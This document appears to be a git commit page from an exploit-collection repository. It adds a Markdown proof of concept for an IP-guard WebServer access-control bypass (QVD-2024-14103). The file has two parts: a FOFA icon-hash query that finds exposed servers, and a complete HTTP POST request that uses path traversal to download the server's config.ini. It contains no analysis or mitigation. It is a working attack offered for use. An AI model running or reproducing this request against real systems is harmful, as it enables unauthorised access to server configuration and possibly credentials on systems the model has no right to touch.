Create IP-guard-WebServer存在权限绕过漏洞(QVD-2024-14103).md
This commit is contained in:
parent
d2d44e7330
commit
e2a54c791d
21
IP-guard-WebServer存在权限绕过漏洞(QVD-2024-14103).md
Normal file
21
IP-guard-WebServer存在权限绕过漏洞(QVD-2024-14103).md
Normal file
@ -0,0 +1,21 @@
|
||||
## IP-guard WebServer存在权限绕过漏洞(QVD-2024-14103)
|
||||
|
||||
## fofa
|
||||
```
|
||||
icon_hash="2030860561"
|
||||
```
|
||||
|
||||
|
||||
## poc
|
||||
```
|
||||
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
|
||||
Host: your-ip
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: zh-CN,zh;q=0.9
|
||||
Connection: close
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A
|
||||
```
|
||||
Loading…
x
Reference in New Issue
Block a user